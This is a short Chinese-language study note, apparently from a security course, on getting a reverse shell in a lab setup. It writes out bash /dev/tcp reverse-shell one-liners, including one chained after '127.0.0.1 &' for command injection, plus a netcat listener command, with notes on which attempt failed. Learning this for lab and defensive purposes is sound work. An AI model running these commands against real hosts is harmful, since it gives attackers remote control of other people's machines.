前言：小迪安全2022第一節(jié)反彈shell，小迪用的是兩臺都是云服務(wù)器，沒有服務(wù)器可以在自己的主機(jī)上搭建也是可以的，主機(jī)上搭兩個網(wǎng)站

思路：生成一個木馬文件，下載到本機(jī)，然后利用本機(jī)上傳到目標(biāo)主機(jī)，執(zhí)行反彈命令。

但是現(xiàn)在這個可以用bash反彈，在centos里面

正題：

在棱角社區(qū)，找到反彈shell

這個是寫在被攻擊機(jī)上的，寫了這個就會將目標(biāo)的控制臺，返回到以下
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1（錯誤）

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1（正確）

然后在攻擊機(jī)上監(jiān)聽上這個端口，監(jiān)聽本地端口的8080

nc64.exe -lvvp 9999? ? ? ? ? ? ? ? //注意加地址好像會監(jiān)聽失敗

做的過程中的問題

在本地監(jiān)聽9999端口，然后在被攻擊機(jī)上發(fā)送對方的控制臺給我的本機(jī)，

但是結(jié)果失敗了。

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1（正確）

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1（錯誤）（棱角社區(qū)有毒）